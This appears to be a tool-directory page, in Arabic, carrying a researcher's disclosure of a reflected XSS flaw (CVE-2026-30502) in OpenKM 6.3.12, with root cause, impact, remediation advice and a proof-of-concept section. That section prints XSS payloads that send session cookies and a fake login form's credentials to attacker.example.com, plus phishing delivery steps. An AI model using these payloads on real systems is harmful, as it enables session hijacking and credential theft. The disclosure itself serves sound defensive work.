Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS — وثائق وإثبات المفهوم لـ CVE-2026-30502، وهي ثغرة XSS منعكسة في OpenKM v6.3.12. تتضمن تحليلًا تقنيًا، السبب الجذري، تقييم التأثير، وإرشادات المعالجة للباحثين في الأمن ومختبرَي الاختراق. | Kitploit
أدوات/GitHubGitHub/dharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss
أدوات التصيدتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubdharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss

CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS

وثائق وإثبات المفهوم لـ CVE-2026-30502، وهي ثغرة XSS منعكسة في OpenKM v6.3.12. تتضمن تحليلًا تقنيًا، السبب الجذري، تقييم التأثير، وإرشادات المعالجة للباحثين في الأمن ومختبرَي الاختراق.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
19منذ 3 أشهرلم تتم المراجعة بعد

🛡️ CVE-2026-30502 — XSS منعكس في OpenKM الإصدار 6.3.12

CVE Badge OpenKM Type Disclosure Status

تم اكتشافه وإبلاغه بواسطة Dharmendra Kumar — باحث أمني

الأمن السيبراني | اختبار الاختراق | أبحاث الثغرات | الإفصاح المسؤول


📌 جدول المحتويات

  • نظرة عامة
  • تفاصيل CVE
  • المنتج المتأثر
  • وصف الثغرة
  • تحليل السبب الجذري
  • تقييم التأثير والمخاطر
  • إثبات المفهوم (PoC)
  • المعالجة والتوصيات
  • الجدول الزمني للإفصاح
  • المراجع
  • حول الباحث

🔍 نظرة عامة

يوثق هذا المستودع الإفصاح المسؤول عن CVE-2026-30502، وهي ثغرة Cross-Site Scripting (XSS) منعكس تم تحديدها في OpenKM الإصدار 6.3.12 — وهو نظام إدارة مستندات مفتوح المصدر يستخدم على نطاق واسع في بيئات المؤسسات والحكومات.

توجد الثغرة في معامل Content، الذي يعكس إدخال المستخدم مرة أخرى إلى المتصفح دون تنقية أو ترميز مناسب. يمكن للمهاجم صياغة رابط ضار يحتوي على نصوص JavaScript مضمنة وخداع الضحية للنقر عليه، مما يؤدي إلى تنفيذ البرنامج النصي داخل جلسة المتصفح الخاصة بالضحية.

⚠️ الخطورة: متوسط–مرتفع | متجه الهجوم: شبكة | الامتيازات المطلوبة: لا شيء | تفاعل المستخدم: مطلوب


📋 تفاصيل CVE

الحقلالتفاصيل
معرف CVECVE-2026-30502
المنتجOpenKM
الإصدار المتأثرv6.3.12
فئة الثغرةCross-Site Scripting (XSS) منعكس
المعامل الضعيفContent
CWECWE-79: تحييد غير صحيح للإدخال أثناء إنشاء صفحة الويب
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
الخطورةمتوسط–مرتفع
الناشربرنامج CVE لـ MITRE
الباحثDharmendra Kumar
نوع الإفصاحمسؤول / منسق

📦 المنتج المتأثر

OpenKM هو نظام إدارة مستندات مفتوح المصدر ومجاني يوفر واجهة ويب لإدارة وتدقيق وتوزيع مستندات الأعمال. يُستخدم من قبل المؤسسات والهيئات الحكومية والمؤسسات التعليمية في جميع أنحاء العالم.

  • اسم المنتج: نظام إدارة المستندات OpenKM
  • الإصدار المتأثر: v6.3.12
  • موقع البائع: https://www.openkm.com
  • الفئة: نظام إدارة المستندات (DMS)
  • اللغة / البيئة التقنية: Java (JSP / Spring Framework)

🧨 وصف الثغرة

تم تحديد ثغرة Cross-Site Scripting (XSS) منعكس في OpenKM الإصدار 6.3.12 عبر معامل Content. يفشل التطبيق في التحقق من صحة أو ترميز الإدخال الذي يقدمه المستخدم قبل عكسه في نص استجابة HTTP، مما يسمح بحقن نصوص JavaScript تعسفية وتنفيذها في متصفح الضحية.

على عكس XSS المخزن، لا يتم تخزين حمولة XSS المنعكس في قاعدة البيانات — بل تحمل داخل رابط مصمم. يعتمد الهجوم على خداع الضحية للنقر على رابط ضار (يتم تسليمه عبر البريد الإلكتروني أو وسائل التواصل الاجتماعي أو حملات التصيد)، وبعدها يتم تنفيذ الحمولة بصمت في المتصفح بسياق جلسة الضحية.

تدفق الهجوم

مهاجم يصمم رابطًا ضارًا
        │
        ▼
ضحية تنقر على الرابط (تصيد / هندسة اجتماعية)
        │
        ▼
المتصفح يرسل طلب GET/POST مع الحمولة في معامل `Content`
        │
        ▼
OpenKM يعكس الإدخال غير المنقى مباشرة في استجابة HTML
        │
        ▼
المتصفح يوزع وينفذ JavaScript المحقون
        │
        ▼
اختطاف الجلسة / سرقة بيانات الاعتماد / اختراق الحساب

🔬 تحليل السبب الجذري

تنتج الثغرة عن فشل التطبيق في فرض ضوابط أمان الإدخال والإخراج على معامل Content:

الضعفالوصف
❌ لا يوجد التحقق من صحة الإدخاليقبل معامل Content أحرف HTML/JavaScript الخام دون قيود أو تصفية
❌ لا يوجد ترميز للمخرجاتتُكتب القيم المنعكسة في استجابة HTML دون ترميز كيانات HTML
❌ عدم وجود رأس CSPلا يتم فرض سياسة أمان المحتوى لمنع تنفيذ البرامج النصية المضمنة
❌ عدم وجود كعكات HTTPOnlyرموز الجلسة يمكن الوصول إليها عبر JavaScript، مما يسمح بسرقة الكعكات مباشرة
رابط من صنع المستخدم ──► معامل Content ──► [لا تحقق]
       ──► منعكسة في استجابة HTML ──► [لا ترميز]
              ──► المتصفح ينفذ البرنامج النصي ──► اختراق الحساب

💥 تقييم التأثير والمخاطر

يمكن أن يؤدي استغلال هذه الثغرة بنجاح إلى:

المخاطرةالوصف
🍪 اختطاف الجلسةسرقة رموز الجلسة النشطة عبر document.cookie لانتحال شخصية الضحية
🔑 حصاد بيانات الاعتمادحقن طبقات تسجيل دخول مزيفة لالتقاط أسماء المستخدمين وكلمات المرور النصية
📤 الكشف عن المعلوماتتسريب محتوى المستندات الحساسة أو بيانات المستخدم أو التكوينات الداخلية
🎣 هجمات التصيدتقديم صفحات مزيفة مقنعة مستضافة داخل نطاق OpenKM الموثوق
👤 الاستيلاء على الحسابتنفيذ إجراءات مصادقة تعسفية نيابة عن الضحية
⚙️ إجراءات غير مصرح بهاتعديل أو حذف أو تسريب المستندات داخل نظام DMS
🖥️ توزيع البرامج الضارةتوجيه الضحايا إلى مواقع يتحكم فيها المهاجم تستضيف تنزيلات ضارة

🧪 إثبات المفهوم (PoC)

⚠️ إخلاء مسؤولية: المعلومات التالية مشتركة بدقة للأغراض التعليمية وبحث الأمن السيبراني وفقًا لمبادئ الإفصاح المسؤول. لا تختبر أو تستخدم هذا ضد أنظمة لا تملكها أو لديك إذن كتابي صريح بتقييمها.

أمثلة الحمولة (عامة)

// Basic execution proof
<script>alert('CVE-2026-30502 - XSS by Dharmendra Kumar')</script>

// Session cookie exfiltration
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

// Credential phishing overlay
<script>
  var d=document.createElement('div');
  d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
    +'<input name="u" placeholder="Username"/>'
    +'<input name="p" type="password" placeholder="Password"/>'
    +'<button>Sign In</button></form>';
  document.body.prepend(d);
</script>

بنية الرابط الضار المصمم

https://target-openkm-instance/[vulnerable-endpoint]?Content=<script>alert(1)</script>

خطوات إعادة الإنتاج

  1. تحديد نقطة النهاية الضعيفة في OpenKM الإصدار 6.3.12 التي تعكس معامل Content
  2. تصميم رابط بإلحاق حمولة XSS بمعامل Content
  3. ترميز الحمولة بالـ URL إذا لزم الأمر
  4. إرسال الرابط المصمم إلى ضحية عبر البريد الإلكتروني أو الدردشة أو أي ناقل هندسة اجتماعية
  5. عندما تفتح الضحية الرابط في جلسة متصفحها الموثقة، يتم تنفيذ الحمولة
  6. ملاحظة تنفيذ JavaScript أو سرقة الكعكات أو سلوك إعادة التوجيه

🛠️ المعالجة والتوصيات

للمطورين / البائعين

التوصيةالتنفيذ
✅ التحقق من صحة الإدخالرفض أو تجريد أحرف HTML الخاصة (<, >, ", ', ;) من جميع المعاملات التي يتحكم فيها المستخدم
✅ ترميز المخرجاتتطبيق ترميز HTML مدرك للسياق باستخدام مكتبات مثل OWASP Java Encoder قبل عرض البيانات المنعكسة
✅ سياسة أمان المحتوىنشر رأس CSP صارم: Content-Security-Policy: default-src 'self'; script-src 'self'
✅ كعكات HTTPOnlyتعيين علامات HttpOnly و Secure على جميع كعكات الجلسة لمنع الوصول عبر JavaScript
✅ مكتبات الأماندمج OWASP AntiSamy أو DOMPurify لتنقية قوية
✅ الترقيةتطبيق أحدث تصحيح أمني من البائع فورًا

لمسؤولي الأنظمة

  • 🔒 تقييد الوصول إلى OpenKM على الشبكات الداخلية/الموثوقة عبر قواعد جدار الحماية
  • 🛡️ نشر جدار حماية لتطبيقات الويب (WAF) مع تواقيع كشف XSS كإجراء تعويضي
  • 📊 مراقبة سجلات الوصول لخادم الويب بحثًا عن علامات برنامج نصي غير متوقعة أو حمولات مشفرة في سلاسل الاستعلام
  • 🔄 الحفاظ على تثبيت OpenKM محدثًا إلى أحدث إصدار آمن
  • 📧 تدريب المستخدمين على توخي الحذر عند النقر على روابط غير مرغوب فيها إلى نظام DMS

📅 الجدول الزمني للإفصاح

تنزيل الأداة